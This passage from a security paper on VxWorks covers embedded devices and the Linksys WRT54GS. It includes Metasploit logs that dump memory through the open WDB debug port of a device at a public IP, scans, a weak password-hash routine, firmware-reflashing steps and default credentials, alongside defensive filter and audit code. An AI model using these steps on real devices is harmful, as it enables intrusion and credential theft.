VxWorks implements a BSD 4.4-compliant TCP/IP stack with complete routing support, enabling IP routers and network devices to be built with VxWorks as the base system. VxWorks also provides the MUX interface to decouple the network protocol layer from the data link layer: to use a driver in the data link layer, the network protocol calls the appropriate MUX routine when the driver is initialized. Applications can use the socket interface to access features of the Internet Protocol (IP) suite, but VxWorks does not support signal functionality for sockets. VxWorks also implements ZBUF (a set of socket calls based on a data abstraction) that allows data buffers to be shared across different software modules. However, ZBUF has a compatibility issue with standard BSD code, whereas the normal datagram (UDP) and stream (TCP) sockets are fully compatible with UNIX BSD 4.4.
STATUS etherInputHookAdd (FUNCPTR inputHook,
                          char *pName,        /* name of device */
                          int unit)           /* unit of device */
BOOL ipFilterHook (struct ifnet *pIf,
                   struct mbuf **pPtrMbuf,
                   struct ip **pPtrIpHdr,
                   int ipHdrLen)
BOOL inputHook (struct ifnet *pIf,
                char *buffer,                 /* received packet */
                int length)
BOOL outputHook (struct ifnet *pIf,
                 char *buffer,
                 int length)
STATUS ipFilterHookAdd (FUNCPTR ipFilterHook)
STATUS etherOutputHookAdd (FUNCPTR outputHook)
Listing 1: VxWorks Network Stack - Hook Functions
The hook functions presented in listing 1 can be used to design a packet dissection module for monitoring the traffic flowing to and from the VxWorks network stack.
7.3 VxWorks and The SSL Game
SSL is required whenever data must be encrypted at the transport layer. However, because of the small memory size of devices built on VxWorks with ARM processors, a complete implementation of the OpenSSL [17] library is very hard to accommodate. A complete rebuild of the OpenSSL libraries is required for them to work with VxWorks, and a certain set of ciphers must be removed from the libraries to make them compact and downloadable. Cryptlib [21] can be used effectively to implement the required cryptographic modules in VxWorks in order to incorporate the SSL protocol. Generally, modifications are required in the makefiles used for "libssl.a" and "libcrypt.a" in the OpenSSL package (not all packages are compatible with VxWorks).
7.4 Firewalling VxWorks
VxWorks itself does not have an inbuilt firewall in general, but it is designed to incorporate third-party firewalls for security purposes. Firefly [22] is the firewall used to configure VxWorks for network security. Firefly is a packet filtering firewall that performs stateful inspection dynamically on inbound traffic; it is designed specifically for embedded devices and works according to the configured policies.
VxWorks also holds Achilles certification [19,20], which comprises a number of tests that check the robustness of the network stack in filtering bad and malformed packets. This shows the effectiveness of VxWorks in detecting intrusions. VxWorks lacks NAT capabilities, but these could also be added using the network-level hooks discussed earlier.
7.5 VxWorks Debugging Interface
VxWorks executes threads with priorities and follows a preemptive scheduling process. It implements an information bus (a shared memory area) for passing critical information among the different running components. All operations on the bus execute according to the priority of the tasks, and access restrictions are synchronized with mutual exclusion locks. In order to diagnose problems such as mutex blocking, an active debugging interface exists. VxWorks runs a well-designed debugging interface on UDP port 17185. This port runs the WDB agent, a system-level debugging service provided by VxWorks. This debugging service provides access to memory: one can read from and write to memory locations efficiently. The service is structured over the Sun RPC protocol. Because it runs over UDP, it does not have any standard authentication procedure [6], so if the port is open, one can access the debugging interface directly. The 3COM SIP phone uses VxWorks as its base OS. A typical scan, presented in listing 2, shows the presence of wdbrpc on port 17185. A list of devices that are vulnerable to this debugging interface security flaw is presented in [11].
SIP/2.0 404 Not Found
From: "default"<sip:default@12.238.71.115>;tag=30636565343737333
To: "default"<sip:default@12.238.71.115>
Call-Id: 258013114488933368019998
Cseq: 1 OPTIONS
Via: SIP/2.0/UDP 78.123.165.119:5060;branch=z9hG4bK-2515319038;rport=5060;received=184.82.238.216
Date: Wed, 23 Feb 2011 16:49:21 GMT
Allow: INVITE, ACK, CANCEL, BYE, REFER, OPTIONS, REGISTER, SUBSCRIBE, NOTIFY
User-Agent: 3Com-SIP-Phone/v2.6.0 (sipXphone) (VxWorks)
root@vmware-virtual-machine:/home/vmware# nmap -P0 -sS -sU -A -O 12.238.71.115 -p 17185
Nmap scan report for 12.238.71.115
Host is up (0.00035s latency).
PORT      STATE         SERVICE VERSION
17185/tcp filtered      unknown
17185/udp open|filtered wdbrpc
Device type: general purpose|storage-misc
Listing 2: Scanning the 3COM SIPX Phone
msf auxiliary(wdbrpc_version) > set RHOSTS 12.238.71.115-116
RHOSTS => 12.238.71.115-116
msf auxiliary(wdbrpc_version) > run
[*] 12.238.71.115: 5.4.2 PC PENTIUM host:/dos0/R6_5_22/vxWorks
msf auxiliary(wdbrpc_bootline) > set RHOSTS 12.238.71.115-116
RHOSTS => 12.238.71.115-116
msf auxiliary(wdbrpc_bootline) > run
[*] 12.238.71.115: 5.4.2 PC PENTIUM host:/dos0/R6_5_22/vxWorks
[*] 12.238.71.115: BOOT ata=0,0(0,0) host:/dos0/R6_5_22/vxWorks e=192.0.0.1 tn=elbrus f=0x0 o=elPci
[*] Auxiliary module execution completed
Listing 3: Gathering Version and Bootline Information - 3COM SIPX Phone
msf auxiliary(wdbrpc_memory_dump) > set RHOST 12.238.71.115
RHOST => 12.238.71.115
msf auxiliary(wdbrpc_memory_dump) > run
[*] Attempting to dump system memory...
[*] 12.238.71.115 Connected to 5.4.2 - PC PENTIUM (host:/dos0/R6_5_22/vxWorks)
[*] Dumping 0x26fff000 bytes from base address 0x00000000 at offset 0x00000000...
[*] [00%] Downloaded 0x000104b4 of 0x26fff000 bytes (complete at 2011-04-14 02:50:07 -0400)
[*] [00%] Downloaded 0x000203dc of 0x26fff000 bytes (complete at 2011-04-14 01:26:47 -0400)
..............................
[-] Auxiliary interrupted by the console user
[*] Auxiliary module execution completed
Listing 4: Downloading Memory Dump - 3COM SIPX Phone
Listing 3 shows the successful enumeration of the VxWorks version and bootline parameters using Metasploit [5] auxiliary modules, and listing 4 shows the download of memory contents from the 3COM SIP phone. This debugging service has an inherent vulnerability: it provides open access to perform operations on the remote machine running VxWorks. Moreover, by using the WDB routine core library and executing code through this running service, it is possible to write to memory locations remotely.
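Since VxWorks has no inbuilt firewall (section 7.4) but does expose the hook interface of listing 1 (section 7.2), one mitigation for the open WDB port is a filter hook that drops UDP datagrams to port 17185 unless they come from a designated management host. The following is an added example, not VxWorks or 3COM code: the real inputHook receives a struct ifnet *, which is replaced here by an opaque pointer so the code builds anywhere, and the management address, the function names and the constructed test frames are assumptions made for this example.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>

/* Added example, not VxWorks code: an etherInputHookAdd()-style hook that
 * filters frames before the stack sees them. Returning TRUE consumes
 * (drops) the frame; returning FALSE hands it to the stack as usual. */

typedef int BOOL;
#define TRUE  1
#define FALSE 0

#define WDB_PORT        17185     /* WDB agent's UDP port */
#define ETH_HDR_LEN     14
#define ETHERTYPE_IPV4  0x0800
#define IPPROTO_UDP_NUM 17

/* Constructed allowlist: the one management host permitted to debug. */
static const uint8_t MGMT_HOST[4] = { 192, 0, 2, 10 };

static uint16_t be16(const uint8_t *p) { return (uint16_t)((p[0] << 8) | p[1]); }

/* Only UDP datagrams to WDB_PORT from hosts other than MGMT_HOST are dropped.
 * Malformed or truncated frames are passed through so the stack discards
 * them with its own checks instead of the hook guessing at their content. */
BOOL wdbFilterInputHook(const void *pIf, const char *buffer, int length)
{
    const uint8_t *f = (const uint8_t *)buffer;
    (void)pIf;
    if (length < ETH_HDR_LEN + 20)
        return FALSE;
    if (be16(f + 12) != ETHERTYPE_IPV4)
        return FALSE;
    const uint8_t *ip = f + ETH_HDR_LEN;
    int ihl = (ip[0] & 0x0f) * 4;
    if ((ip[0] >> 4) != 4 || ihl < 20 || length < ETH_HDR_LEN + ihl + 8)
        return FALSE;
    if (ip[9] != IPPROTO_UDP_NUM)
        return FALSE;
    const uint8_t *udp = ip + ihl;
    if (be16(udp + 2) != WDB_PORT)          /* UDP destination port */
        return FALSE;
    if (memcmp(ip + 12, MGMT_HOST, 4) == 0) /* IPv4 source address */
        return FALSE;
    return TRUE;
}

/* Builds a constructed Ethernet/IPv4/UDP frame (no checksums) for tests. */
int build_udp_frame(uint8_t *out, const uint8_t src[4], uint16_t dport)
{
    memset(out, 0, ETH_HDR_LEN + 20 + 8);
    out[12] = 0x08; out[13] = 0x00;                  /* EtherType IPv4 */
    uint8_t *ip = out + ETH_HDR_LEN;
    ip[0] = 0x45;                                    /* IPv4, IHL = 5 */
    ip[3] = 28;                                      /* total length */
    ip[8] = 64;                                      /* TTL */
    ip[9] = IPPROTO_UDP_NUM;
    memcpy(ip + 12, src, 4);
    ip[16] = 192; ip[17] = 0; ip[18] = 2; ip[19] = 1; /* phone address */
    uint8_t *udp = ip + 20;
    udp[0] = 0x04; udp[1] = 0xd2;                    /* source port 1234 */
    udp[2] = (uint8_t)(dport >> 8); udp[3] = (uint8_t)dport;
    udp[5] = 8;                                      /* UDP length */
    return ETH_HDR_LEN + 28;
}

/* Runs the hook over constructed frames and returns a bit mask of the
 * expected decisions: bit0 other host -> WDB dropped, bit1 management
 * host -> WDB passed, bit2 other host -> SIP 5060 passed, bit3 truncated
 * frame passed. 15 means every decision was as intended. */
int wdb_hook_selftest(void)
{
    static const uint8_t other[4] = { 198, 51, 100, 7 };   /* constructed */
    uint8_t frame[64];
    int mask = 0, n;
    n = build_udp_frame(frame, other, WDB_PORT);
    if (wdbFilterInputHook(NULL, (const char *)frame, n) == TRUE)  mask |= 1;
    n = build_udp_frame(frame, MGMT_HOST, WDB_PORT);
    if (wdbFilterInputHook(NULL, (const char *)frame, n) == FALSE) mask |= 2;
    n = build_udp_frame(frame, other, 5060);
    if (wdbFilterInputHook(NULL, (const char *)frame, n) == FALSE) mask |= 4;
    if (wdbFilterInputHook(NULL, (const char *)frame, 10) == FALSE) mask |= 8;
    return mask;
}
```

On a real target the hook would be registered with etherInputHookAdd() from listing 1; disabling the WDB agent in the kernel configuration remains the stronger fix where debugging is not needed in production.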
7.6 Weak Password Encryption Algorithm
VxWorks uses the inbuilt vxencrypt utility to generate encrypted passwords; it relies on the weak hashing algorithm [4] presented in listing 5.
#include "vxWorks.h"
#include "loginLib.h"
#include "errnoLib.h"
#include <stdio.h>
#include <string.h>

STATUS loginDefaultEncrypt
    (
    char *in,      /* input string */
    char *out      /* encrypted string */
    )
    {
    int ix;
    unsigned long magic = 31695317;
    unsigned long passwdInt = 0;

    /* reject passwords shorter than 8 or longer than 40 characters */
    if (strlen (in) < 8 || strlen (in) > 40)
        {
        errnoSet (S_loginLib_INVALID_PASSWORD);
        return (ERROR);
        }

    /* position-weighted sum; '*' binds tighter than '^' */
    for (ix = 0; ix < strlen (in); ix++)
        passwdInt += (in[ix]) * (ix + 1) ^ (ix + 1);

    sprintf (out, "%u", (long) (passwdInt * magic));

    /* map the decimal digits onto a wider character set */
    for (ix = 0; ix < strlen (out); ix++)
        {
        if (out[ix] < '3') out[ix] = out[ix] + '!';
        if (out[ix] < '7') out[ix] = out[ix] + '/';
        if (out[ix] < '9') out[ix] = out[ix] + 'B';
        }

    return (OK);
    }
Listing 5: VxWorks Weak Encryption Algorithm
In general, the total number of permutations for this algorithm is not very high and can be brute forced very easily. This is compounded by the absence of any account lockout policy in VxWorks after a number of failed attempts. One can use FTP or telnet as the protocol to launch this attack.
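As an added example (not the paper's or Wind River's code), the routine from Listing 5 ported to Python and used from the auditor's side: it reproduces the stored-hash format so that a credential table can be checked for accounts still protected by this scheme. It assumes a 32-bit unsigned long, as on the VxWorks 5.x targets discussed; the credential table is constructed.

```python
# Added example, not the paper's code: Python port of loginDefaultEncrypt()
# from Listing 5, used to audit a credential table for hashes produced by
# this weak scheme. Assumes a 32-bit unsigned long (the VxWorks 5.x targets
# in the paper), so the product with the magic constant wraps modulo 2**32.
from typing import Dict, List, Optional

MAGIC = 31695317
MASK32 = 0xFFFFFFFF

# Output alphabet of the digit remapping loop in Listing 5: '0'-'2' get '!'
# added, '3'-'6' get '/', '7'-'8' get 'B', and '9' is left unchanged.
VXENCRYPT_ALPHABET = frozenset("QRSbcdeyz9")


def vx_encrypt(password: str) -> Optional[str]:
    """Return the vxencrypt-style hash, or None where the C code returns ERROR."""
    if len(password) < 8 or len(password) > 40:
        return None  # S_loginLib_INVALID_PASSWORD path in Listing 5
    passwd_int = 0
    for ix, ch in enumerate(password):
        # C precedence: (in[ix] * (ix+1)) ^ (ix+1); Python binds * tighter than ^ as well
        passwd_int = (passwd_int + ((ord(ch) * (ix + 1)) ^ (ix + 1))) & MASK32
    digits = str((passwd_int * MAGIC) & MASK32)  # sprintf(out, "%u", ...)
    out = []
    for d in digits:
        c = ord(d)
        if c < ord("3"):
            c += ord("!")
        if c < ord("7"):
            c += ord("/")
        if c < ord("9"):
            c += ord("B")
        out.append(chr(c))
    return "".join(out)


def looks_like_vxencrypt(stored: str) -> bool:
    """Profile check: a 32-bit value printed in decimal has at most 10 digits,
    and the remapping sends every digit into VXENCRYPT_ALPHABET, so each hash
    from this scheme is 1..10 symbols from that alphabet. The converse does
    not hold, so a match is a lead to confirm, not a proof."""
    return 1 <= len(stored) <= 10 and set(stored) <= VXENCRYPT_ALPHABET


def audit_credentials(table: Dict[str, str]) -> List[str]:
    """Return the accounts whose stored hash matches the weak vxencrypt profile."""
    return [user for user, h in table.items() if looks_like_vxencrypt(h)]


# Constructed sample credential table: one vxencrypt-style hash (of a test
# password) and one hex digest from a different, unrelated scheme.
SAMPLE_TABLE = {
    "admin": vx_encrypt("aaaaaaaa"),
    "guest": "00112233445566778899aabbccddeeff",
}
```

Because the output is a decimal rendering of one 32-bit value, the scheme can never produce more than 2**32 distinct hashes whatever the password length, which is the bound behind the paper's brute-force remark.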
7.7 NDP Information Disclosure
IPv6 [12] uses the Neighbor Discovery Protocol (NDP) [9] for locating routers on the link. The VxWorks real-time OS implements NDP in an insecure way [3] when discovering the network reachability of nearby nodes on the same IPv6 link. An attacker using a spoofed IPv6 address as the source address forces the router to create a cache entry. After successful creation of the entry, the IPv6 implementation in VxWorks creates a Forwarding Information Base (FIB) entry which may trick the router into forwarding traffic to the attacker residing on the same IPv6 network. The attacker may intercept private traffic and in certain scenarios may cause a Denial of Service (DoS) by congesting the network. This flaw was discovered in 2008 and has not been patched yet.
8 Design of VxWorks 5.x - Firmware
Firmware is the heart of any embedded device. Firmware analysis provides a more robust picture of the security model adopted by the device. It also helps us to identify security vulnerabilities in the device. In this section, VxWorks firmware details are dissected to understand the discrete details of the firmware.
8.1 VxWorks Firmware Generic Structure
VxWorks OS (firmware) provides reduced flash and RAM which is not compatible with third party firmware until the proprietary image is killed and reflashed to install a new open source firmware. Generally, a VxWorks 5.x firmware image consists of 8 trailer files and 8 primary files, thus 16 different internal files in total. Listing 6 shows the analyzed layout of the VxWorks firmware image in the Linksys router. The primary files are written to flash specifically, whereas the trailer files (unknown in nature) are supporting files that keep the firmware image intact. The images usually end on a 32-bit aligned boundary.
E:\audit\vxworks>wrt_vx_imgtool.exe vxworks_wrt45gs.bin
+ Found parameter, view firmware
+ Infile parameter vxworks_wrt45gs.bin
Extracting firmware vxworks_wrt45gs.bin
Firmare file size is 1769384 bytes
Code pattern: 5SGW
Build date: 10-05-09
Vendor name: Linksys
Device name: WRT54GS
Checksum: 0x9FC74AB0 (given)
Checksum: 0x9FC74AB0 (calculated)
Checksum CORRECT
+ Trailing files:
File descriptor 0, Type Id: 16
File descriptor 1, Type Id: 17
File descriptor 2, Type Id: 18
File descriptor 3, Type Id: 19
File descriptor 4, Type Id: 341191297
File descriptor 5, Type Id: -1616601592
File descriptor 6, Type Id: 18499
File descriptor 7, Type Id: 759
+ Primary files:
File descriptor 0, Name: vxworks.bin
File descriptor 1, Name: igwhtm.dat
File descriptor 2, Name: langpak_en.dat
File descriptor 3, Type Id: 11
File descriptor 4, Type Id: 12
File descriptor 5, Type Id: 13
File descriptor 6, Type Id: 14
File descriptor 7, Type Id: 15
Done!
Listing 6: VxWorks 5.x-6.x Firmware Image
9 VxWorks Firmware Security Analysis
In order to analyze the security features in the real-time environment, we looked into the VxWorks 5.x OS (firmware) running on the Linksys router WRT54GS version 6. As VxWorks is proprietary firmware, a number of restrictions apply to it compared with open source firmwares such as Linux and DD-WRT. During the course of this experiment, we analyzed the security model of firmware 1.50.6, which is used in VxWorks 5.x-6.x versions.
9.1 Hacking Boot Sequence Program (BSP)
The most critical step in VxWorks firmware hacking is the replacement of the Boot Sequence Program (BSP) with the Common Firmware Environment (CFE). The generic way to do this is by using a JTAG programming cable, which is replaced with the parallel-3 programming cable. However, the following points should be taken into account while setting up the JTAG interface with the motherboard or the embedded device board.
• It provides a connection from the parallel port on your PC to a standard 6-pin JTAG header on the target board. However, the pins have to be selected in the right manner. This is because the JTAG header has to be installed on the target board before actual programming can be done.
• NVRAM (-erase:nvram) and the kernel (-erase:kernel) should be removed appropriately in order to take control of the router on the embedded device.
• One should take a backup of the CFE image (-backup:cfe). The backup must be taken at least three times so that final verification can be done after validating the contents of the CFE.
• The last step is to flash the new (open source) firmware on the target board through TFTP.
For analyzing VxWorks firmware (or any firmware), the best way is to disassemble the BSP. This is because the BSP parses the structural code of the VxWorks firmware format. The next step is to look for the different types of blocks (as most blocks are unidentified) and try to verify whether an unused block can be used to flash the new image over the BSP, i.e. replacing the BSP with CFE tactically. In other words, detecting which block is being used for the boot loading process. However, this process also includes verification of the checksum algorithm. This trick is used to kill the VxWorks firmware, and this binary file is applied during the management mode. Jeremy Collake from Bitsum Technologies has developed a VxWorks firmware killing binary that can also be used directly. For different versions of the Linksys router, one can also modify the code to run appropriately on other firmwares.
NOTE: For doing symmetric analysis on VxWorks firmware, the /dev/ttyS0 team has released a tutorial for reversing a VxWorks firmware image [23]. The tutorial is fruitful when a firmware has to be reversed without the device at hand.
9.2 VxWorks Firmware Killer
Generally, the VxWorks firmware used in home routers such as the WRT54GS (Linksys) has reduced flash memory and RAM. There are a lot of restrictions posed on the VxWorks firmware in order to have a controlled secure environment. However, it is still possible to kill this firmware and load another third party firmware such as DD-WRT. Installing a new firmware by killing the old version of the firmware is termed the flashing process. In this step, no hardware modifications take place. Listing 7 shows the output of the VxWorks killer binary.
E:\audit\vxworks>wrt_vx_imgtool.exe -x vxworks_killer_gv06.bin
WRT54G/GS v5-v6 firmware image builder, extractor, fixer, and viewer
Extracting firmware vxworks_killer_gv06.bin
Firmare file size is 327168 bytes
Code pattern: 5VWG
Build date: 07-08-06
Vendor name: Linksys
Device name: WRT54G
Checksum: 0x1A21473A (given)
Checksum: 0x1A21473A (calculated)
Checksum CORRECT
+ Trailing files:
+ Primary files:
-
File descriptor 0; Type Id: 1;
Name: bootrom.bin; Size: 326656;
Writing file bootrom.bin
-
File descriptor 1; Type Id: 0
Name: ; Size: 0
Done!
Listing 7: Extracting CFE image of VxWorks Killer
In Listing 8, the CFE (Common Firmware Environment) [7] image (bootrom.bin) [15] has been extracted from the primary file. The image tool utility [8] is used to extract the CFE image. It is also possible to tamper with the VxWorks Boot Sequence Program (BSP) with BSPTOOL [16].
E:\audit\vxworks>imgtool_nvram.exe bootrom.bin
Free for all the world. GPL License.
+ CFE image: bootrom.bin
+ Reading nvram...
boardflags=0x2558 ; boardnum=42
boardrev=0x10 ; vxkilled=g
teacup=db90h ; et0macaddr=00:40:10:10:00:01
il0macaddr=00:40:10:10:00:02 ; wl0gpio0=2
wl0gpio1=5 ; wl0gpio2=0
wl0gpio3=0 ; boardtype=0x0467
sromrev=2 ; clkfreq=200
sdram_init=0x0002 ; sdram_config=0x0032
sdram_refresh=0 ; sdram_ncdl=0
et0phyaddr=30 ; et0mdcport=0
et1phyaddr=0x1f ; wl0id=0x4318
aa0=3 ; ag0=2
pa0maxpwr=72 ; pa0itssit=62
pa0b0=0x176e ; pa0b1=0xfa35
pa0b2=0xfe77 ; opo=12
wl0gpio5=2 ; cctl=0
ccode=0 ; vlan0hwname=et0
vlan0ports=3 2 1 0 5* ; vlan1hwname=et0
vlan1ports=4 5 ; landevs=vlan0 wl0
wandevs=et0 ; lan_ipaddr=192.168.1.1
lan_netmask=255.255.255.0 ; boot_wait=on
reset_gpio=7 ; watchdog=3000
gpio1=ses_led ; gpio14=ses_button
Embedding nvram...
+ Writing nvram...
boardflags=0x2558 ; boardnum=42
boardrev=0x10 ; vxkilled=g
teacup=db90h ; et0macaddr=00:40:10:10:00:01
il0macaddr=00:40:10:10:00:02 ; wl0gpio0=2
wl0gpio1=5 ; wl0gpio2=0
wl0gpio3=0 ; boardtype=0x0467
sromrev=2 ; clkfreq=200
sdram_init=0x0002 ; sdram_config=0x0032
sdram_refresh=0 ; sdram_ncdl=0
et0phyaddr=30 ; et0mdcport=0
et1phyaddr=0x1f ; wl0id=0x4318
aa0=3 ; ag0=2
pa0maxpwr=72 ; pa0itssit=62
pa0b0=0x176e ; pa0b1=0xfa35
pa0b2=0xfe77 ; opo=12
wl0gpio5=2 ; cctl=0 ; ccode=0
vlan0hwname=et0 ; vlan0ports=3 2 1 0 5*
vlan1hwname=et0 ; vlan1ports=4 5
landevs=vlan0 wl0 ; wandevs=et0
lan_ipaddr=192.168.1.1 ; lan_netmask=255.255.255.0
boot_wait=on ; reset_gpio=7
watchdog=3000 ; gpio1=ses_led
gpio14=ses_button
Completed successfully..
Listing 8: Extracting NVRAM variable from Bootrom.bin
Listing 8 shows exactly how the nvram is updated and embedded so that new values can be written. The scenarios discussed above show the potential threats to VxWorks firmware used in routers. The nvram variables define the boot sequence pattern during reboot and other critical settings. Before installing the new firmware on a VxWorks device, a binary file (bootrom.bin) is designed which provides the default nvram variables required to boot the router during the firmware upgrade. In general, the nvram is re-flashed with new boot parameters, which itself prepares the router for changes in the firmware. Basically, the embedded nvram is used when the real nvram is either corrupted or empty, so that the device can be restored to defaults.
9.3 Services and Port Layout
There are certain differences in the remote management of VxWorks running on Linksys as compared to other open source firmwares, which are as follows:
• By default, the WRT54GS (running VxWorks 5.x) version 6 does not support Telnet and FTP as part of the remote administration process. The firmware has restricted the use of these protocols and only supports HTTP/HTTPS over ports 80 and 8080. This constraint actually reduces the interactivity with the OS.
• The firmware does not support the SSH (Secure Shell) protocol for remote administration. In order to use SSH, one has to kill VxWorks and re-flash an open source firmware such as DD-WRT [13].
Listing 9 shows the scanning results of our testbed environment running VxWorks 5.x on Linksys.
Starting Nmap 5.51 ( http://nmap.org ) at 2011-03-19 00:59 Eastern Daylight Time
Nmap scan report for 192.168.1.1
Host is up (0.0026s latency).
Not shown: 96 filtered ports
PORT     STATE  SERVICE VERSION
21/tcp   closed ftp
23/tcp   closed telnet
80/tcp   open   http    Intoto httpd 1.0
1723/tcp open   pptp    Intoto
MAC Address: 00:18:39:81:77:B5 (Cisco-Linksys)
Device type: WAP|broadband router
Running: Linksys embedded, Netgear embedded, Netgear VxWorks 5.X
OS details: Linksys WRT54G or WRT54G2, or Netgear WGR614 or WPN824v2 wireless broadband router, Netgear WGT624 WAP, Netgear WGR614v7, WGT624v3, or WPN824v2 WAP (VxWorks 5.4.2)
Network Distance: 1 hop
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 37.56 seconds
Listing 9: Scanning the WRT54GS v6
9.4 Factory Default Passwords
VxWorks runs on a number of embedded devices which are configured with factory default passwords that are used to configure the installed firmware. There is no doubt that enforcing password policies is a configuration issue, but it is an unavoidable part of security. VxWorks, like other firmwares, also implements factory default passwords. For example, VxWorks used in router devices is configured with the (admin, admin) and (guest, guest) username and password combinations respectively. This fact should be taken into account when any VxWorks device is tested for security concerns before deploying it in the production environment.
9.5 Config.bin - Inappropriate Encryption
Backup restoration is a standard process for taking control of all the configuration parameters. Usually, all firmware backup files are stored in binary format as config.bin. Generally, the file is structured in a manner which is easily readable by the firmware while restoring and upgrading. Opening the config.bin file in an editor produces scrambled output because of the random code. This gives the impression that config.bin is not fully encrypted or is insufficiently compressed. However, reading the config.bin file carefully, one can find plain text parameters. Since the size of the file is not big, walking through the file is not a hard task. Unfortunately, the config.bin file reveals the router administration password, SSID and secret key in plain text. Figure 3 shows the successful tracing of security credentials in the config.bin file. This security issue was found during the course of this experiment.
Figure 3: Configuration Binary File - Clear Text Credentials
10 Embedded Devices - Truth about Security
There are certain truths about embedded device security that must be taken into account while doing reverse engineering and auditing for security vulnerabilities. Some of the generic issues are discussed as follows:
10.1 Embedded Private Keys - HTTPS Communication
Nowadays, every embedded device provides a web interface in order to administer the device. It has been noticed that many vendors embed the private keys in the firmware itself. Of course, these private keys vary from version to version, but hard coding is not a secure practice. It means that if a device is configured to communicate over HTTPS, the device is going to use the private key that is hard coded in the firmware. This is a potential security issue because firmwares are openly available and, on successful reversing, the keys can be extracted easily.
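As an added example (not the paper's code), an offline audit that a device owner or vendor can run over a config.bin backup or a firmware image before it ships, covering the two findings above: plain text credential fields (Section 9.5) and private keys embedded in the image (Section 10.1). The credential field names and the sample blob are constructed for the demonstration; real images use vendor-specific names.

```python
# Added example, not the paper's code: an offline audit of a firmware image or
# config.bin backup for the two findings described above, plaintext credential
# fields (Section 9.5) and embedded PEM private keys (Section 10.1). The
# credential field names and the sample blob are constructed for the demo.
import re
from typing import Dict, List

# Substrings that mark credential-bearing settings in router backups (constructed).
SECRET_KEY_MARKERS = ("passwd", "password", "wpa_psk", "wep_key", "psk")

# key=value pairs of printable ASCII; the value stops at '=' or at any
# non-printable byte, which fits NUL-separated nvram-style settings.
KV_RE = re.compile(rb"([A-Za-z0-9_]{2,32})=([\x20-\x3c\x3e-\x7e]{1,64})")

# PEM private key block; the backreference requires matching BEGIN/END labels.
PEM_RE = re.compile(rb"-----BEGIN ([A-Z ]*PRIVATE KEY)-----.*?-----END \1-----", re.S)


def find_plaintext_secrets(blob: bytes) -> Dict[str, str]:
    """Return key=value settings whose key names a credential field."""
    found: Dict[str, str] = {}
    for key, val in KV_RE.findall(blob):
        name = key.decode("ascii")
        if any(marker in name.lower() for marker in SECRET_KEY_MARKERS):
            found[name] = val.decode("ascii")
    return found


def find_private_keys(blob: bytes) -> List[str]:
    """Return the PEM label of every private key block embedded in the blob."""
    return [m.group(1).decode("ascii") for m in PEM_RE.finditer(blob)]


def audit_image(blob: bytes) -> Dict[str, object]:
    """Combine both checks into one report; empty entries mean no finding."""
    return {
        "plaintext_secrets": find_plaintext_secrets(blob),
        "private_keys": find_private_keys(blob),
    }


# Constructed sample: a binary header, NUL-separated settings, filler bytes
# and a PEM block whose body is a placeholder, not a real key.
SAMPLE_BLOB = (
    b"\x00\x01\x02\xff\x9f\xc7\x4a\xb0"
    + b"lan_ipaddr=192.168.1.1\x00"
    + b"http_passwd=admin\x00"
    + b"wl_ssid=linksys\x00"
    + b"wl_wpa_psk=CONSTRUCTED-PSK\x00"
    + b"\xde\xad\xbe\xef"
    + b"-----BEGIN RSA PRIVATE KEY-----\n"
    + b"PLACEHOLDER-NOT-A-REAL-KEY\n"
    + b"-----END RSA PRIVATE KEY-----\n"
)
```

A non-empty report on a backup means the file must be stored and transported as a secret; a non-empty private_keys list on a shipping image means every unit shares that key and it should be generated per device instead.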
10.2 Firmware Checksum Algorithms
The checksum algorithms used in firmwares are not robust, and reversing them is a trivial process. The firmwares do not use multiple obfuscation algorithms or long message digests. The firmwares require a more sophisticated implementation of cryptographic modules.
10.3 Insecure Web Interfaces
Vulnerabilities in the web interface can be disastrous from a security point of view. The HTML pages are embedded in zipped format and are compressed in the firmware. Once the device boots and the firmware is loaded, the web interface is installed and can be easily accessed through port 80 or 8080. The security model of the web interface in the firmware is not secure and is always prone to security vulnerabilities. The OWASP Top 10 [24] fits very well for testing web interfaces against critical vulnerabilities. A number of web attacks can be conducted easily to control the device remotely.
10.4 Unpatched Firmware and Obsolete Versions
Firmwares are not updated regularly. It has been observed that updating firmware on embedded devices is not treated as a security practice in the way operating system updates are. It is very easy to find embedded devices running unpatched and older versions of firmware, which provide an attack surface to control the device by exploiting vulnerabilities.
11 Future Work
A number of vulnerabilities discussed in this paper are in the process of being patched. A thorough understanding of the OS vulnerabilities can help researchers to delve deeper into the inherent security model of VxWorks. It can contribute to the creation of new, robust and effective security models. VxWorks, being a real-time OS, is more secure as compared to other real-time OSes, but the presence of security vulnerabilities makes it prone to attacks. OS security testing helps to eradicate a number of flaws, thereby making the OS more secure. In the coming times, security concerns should be given the utmost importance. Consequently, OS designs should be validated regularly for the detection of potential flaws, thereby eradicating security vulnerabilities.
12 Conclusion
In this paper, we described the existing security vulnerabilities in the VxWorks OS and firmware. We conducted experiments to verify the potential impact of these vulnerabilities in order to understand the inherent security model of VxWorks. The analysis revealed new security issues in VxWorks firmware. VxWorks is exposed to a specific set of security issues in spite of being a real-time OS, which ensures that it is more secure than other open source models. Nonetheless, VxWorks is restricted, as it does not allow extensible operations to be performed, in order to avoid many default configuration bugs. The vulnerabilities discussed and validated in this experiment have not been patched yet, but Wind River Systems knows about them. VxWorks is still utilized in heavy volumes in embedded devices owing to the feasibility of its implementation in different environments.
13 References
[1] Wind River Systems, High-Availability CompactPCI Systems: Introduction to Foundation HA, COTS Journal, September 2003, 47-53.
[2] T. Anderson, T. Grabbe, J. Hammersley, et al., Providing Open Architecture High Availability Solutions, HA Forum, February 2001.
[3] SecurityFocus, Multiple Vendors IPv6 Neighbor Discovery Protocol Implementation Address Spoofing Vulnerability, http://www.securityfocus.com/bid/31529/info
[4] Metasploit Blog, Shiny Old VxWorks Vulnerabilities, http://blog.metasploit.com/2010/08/vxworks-vulnerabilities.html
[5] Metasploit, http://www.metasploit.com
[6] SecurityFocus Vulnerability Database, VxWorks Debugging Service Security-Bypass Vulnerability, http://www.securityfocus.com/bid/42158
[7] OpenWrt Docs, CFE - Common Firmware Environment, http://oldwiki.openwrt.org/OpenWrtDocs%282f%29Customizing%282f%29Firmware%282f%29CFE.html
[8] CFE - Common Firmware Environment Image Tool, http://www.bitsum.com/files/wrt_vx_imgtool.zip
[9] RFC 2461, http://www.ietf.org/rfc/rfc2461.txt
[10] VxWorks Check Stack(), VxWorks Configuration Documentation, http://www.eso.org/projects/vlt/sw-dev/wwwdoc/ADD-DOC/VLT-MAN-ESO-17210-0667/Output/configuration.html
